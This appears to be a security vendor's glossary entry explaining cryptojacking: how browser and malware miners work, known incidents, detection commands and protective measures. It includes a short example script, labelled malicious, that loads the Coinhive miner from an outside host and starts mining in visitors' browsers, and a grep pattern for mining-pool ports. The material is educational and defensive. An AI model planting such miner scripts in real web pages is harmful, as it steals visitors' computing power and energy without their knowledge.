Skip to content

Services, Wiki-Artikel, Blog-Beiträge und Glossar-Einträge durchsuchen

↑↓NavigierenEnterÖffnenESCSchließen
Malware Glossary

Cryptojacking

The unauthorized use of another person’s computing power for cryptocurrency mining without the owner’s knowledge. Often carried out via browser scripts or malware—recognizable by an unexpected spike in CPU usage. This results in high energy costs and system wear and tear.

Cryptojacking refers to the unauthorized use of third-party computing resources to mine cryptocurrencies (mostly Monero, as it is CPU-friendly and anonymous). Attackers do not need their own infrastructure—they simply "steal" the computing power of millions of infected devices.

How Cryptojacking Works

Browser-Based Cryptojacking

The classic example was Coinhive (2017–2019): a JavaScript library that mined Monero in the browser—sometimes with the website owner’s knowledge as an “alternative to advertising,” but often without.

<!-- Bösartiges Script in kompromittierter Webseite -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous(&#x27;wallet-address&#x27;);
  miner.start();
</script>```

Website visitor: CPU usage jumps to 90%+, fan starts spinning.

**Today:** Coinhive is down, but successors exist. Browser mining is less popular due to browser blocking and improved AV detection.

### Malware-based Cryptojacking

Malware such as **XMRig** is installed on compromised systems:

- **Infection vector:** Unpatched servers, phishing, supply chain
- XMRig (Monero miner) is installed as a service
- Runs 24/7 with throttled CPU (70–80% instead of 100%—to avoid detection)
- Mines Monero and sends it to the attacker’s wallet

**Known cases:**
- Tesla (2018): Kubernetes admin console openly accessible → Crypto miner installed
- WannaMine (2018): Used EternalBlue (NSA exploit) for distribution → Monero mining
- Prometei botnet: Compromised exchange servers via ProxyLogon

## Detection

**Symptoms:**
- Unexpected, sustained CPU spike (&gt; 70–80% without known load)
- Increased energy costs
- System overheating
- Slower applications

**Technical Detection:**
```bash
# Linux: Check processes with high CPU usage
top -o %CPU
ps aux --sort=-%cpu | head -20

# Network connections to known mining pools
ss -tulnp | grep -E &quot;3333|4444|5555|14444|7777&quot;
# Mining pool ports: often 3333, 4444, 14444

# Unknown scheduled tasks
crontab -l
systemctl list-units --type=service --state=running

In enterprise environments:

  • SIEM rule: CPU > 90% for > 30 minutes on server
  • DNS monitoring: Queries to known mining pool domains
  • EDR detects XMRig and similar tools

Impact on Businesses

  • Energy costs: Servers running cryptominers consume 200–300% more power
  • Hardware wear and tear: Continuous full load accelerates CPU aging
  • Performance degradation: Critical applications are slowed down
  • Indicator of a larger breach: Cryptojacking indicates that attackers have access—often just "harmless" use until ransomware appears profitable

Protection

  • Patching: EternalBlue, ProxyLogon, and Log4Shell were the main entry points
  • EDR: Behavior-based detection of mining processes
  • Browser extensions: MinerBlock, NoCoin for browser mining
  • DNS filtering: Block known mining pool domains
  • Kubernetes hardening: Admin consoles not publicly accessible
  • Network monitoring: Anomalous outbound connections to pool ports

AWARE7 Services on This Topic

Penetrationstest Security Awareness Training
Back to Glossary Book a free consultation